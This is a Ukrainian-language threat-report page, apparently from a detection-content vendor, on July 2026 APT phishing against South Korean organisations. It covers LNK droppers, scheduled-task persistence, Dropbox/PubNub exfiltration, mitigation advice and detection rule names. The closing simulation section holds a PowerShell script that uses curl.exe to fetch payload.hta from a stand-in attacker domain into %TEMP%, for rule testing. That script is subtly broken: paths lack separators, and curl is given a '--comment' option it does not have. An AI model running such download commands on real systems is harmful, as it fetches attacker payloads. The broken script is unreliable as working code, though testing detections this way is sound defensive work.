Звіт про загрози APT з Південної Кореї: Тенденції липня 2026 року
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
AhnLab повідомляє про зростання активності APT, націленої на організації Південної Кореї через кампанії фішингу. Атаки в першу чергу спираються на зловмисні файли LNK для доставки завантажуваного коду, що включає PowerShell скрипти, AutoIt скрипти та бекдори. Загальні техніки включають забезпечення стійкості через Планувальник завдань та ексфільтрацію даних через сервіси такі, як Dropbox та PubNub.
Розслідування
Розслідування зосередилося на інфраструктурі APT, що використовувалася проти південнокорейських організацій впродовж липня 2026 року. Аналітики згрупували активність у кілька типів атак, від A до G, на основі методів доставки та функціональних характеристик. Дослідники також ідентифікували поведінки, включаючи підстановку DLL та зловживання вбудованими утилітами Windows, такими, як curl.exe для отримання завантажуваного коду.
Мітигація
Користувачі повинні перевіряти ідентичності відправників і уникати відкривання вкладень, отриманих від невідомих або недовірених джерел. Організаціям слід оновлювати операційні системи і веб-браузери останніми патчами безпеки. Також рекомендується підтримувати актуальними антивірусні та рішення для захисту кінцевих точок, такі як V3.
Реагування
Якщо виявлено підозрілі файли LNK або несанкціоновані записи в Планувальнику завдань, відповідальні за інциденти повинні негайно ізолювати уражений хост. Проводьте аналіз пам’яті для виявлення ін’єкційних бекдорів або зловмисних DLL-файлів. Журнали мережі також слід переглядати на предмет незвичайної вихідної активності до файлообмінних сервісів або каналів управління та контролю, таких як PubNub.
Потік Атаки
Ми все ще оновлюємо цю частину.
Виявлення
Підозріла поведінка ухилення від захисту LOLBAS MSHTA через виявлення пов’язаних команд (via process_creation)
Підозріле використання CURL (via cmdline)
Підозріле заплановане завдання (via audit)
Можлива інфільтрація/ексфільтрація даних/с2 через сторонні сервіси/інструменти (via proxy)
Можлива інфільтрація/ексфільтрація даних/с2 через сторонні сервіси/інструменти (via dns)
IOC (HashMd5) для виявлення: Звіт про загрозу APT атак (Південна Корея) за липень 2026 року
Curl.Exe використовується для завантаження та виконання зловмисних файлів [Windows Sysmon]
Виявлення зловмисних PowerShell команд у файлах LNK [Windows Powershell]
Симуляція Виконання
Передумова: Перевірка телеметрії та базового рівня має бути пройдена.
Мотивація: Цей розділ деталізує точне виконання техніки противника (TTP), розроблене для спрацювання правила виявлення. Команди та виклад повинні безпосередньо відображати ідентифіковані TTP і націлюватися на генерацію саме тієї телеметрії, яка очікується у логіці виявлення. Абстрактні або не пов’язані приклади можуть привести до неправильної діагностики.
-
Сценарій атаки та команди: Противник має намір використати
curl.exeдля завантаження зловмисного HTA файлу в%TEMP%каталог для закріплення позиції. Щоб перевірити, чи працює поточна логіка виявлення (оскільки вона спеціально шукає слова “download” або “execute”), зловмисник використає командний рядок, що явно містить ці слова в якості частини фальшивого аргументу або опису, імітуючи слабко сконструйований скрипт або конкретну спробу імітувати шаблон, який SOC шукає. -
Скрипт тестування регресії:
# Імітуємо зловмисника, використовуючи curl із конкретними ключовими словами, потрібними для правила $tempPath = $env:TEMPmalicious.hta $url = "http://attacker-controlled-domain.com/payload.hta" # Ця команда спеціально розроблена для спрацювання 'contains' логіки правила # уключаючи слова 'download' і 'execute' в рядок команд. Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'" -
Команди очищення:
# Видалити фіктивний файл, створений під час симуляції if (Test-Path "$env:TEMPmalicious.hta") { Remove-Item -Path "$env:TEMPmalicious.hta" -Force }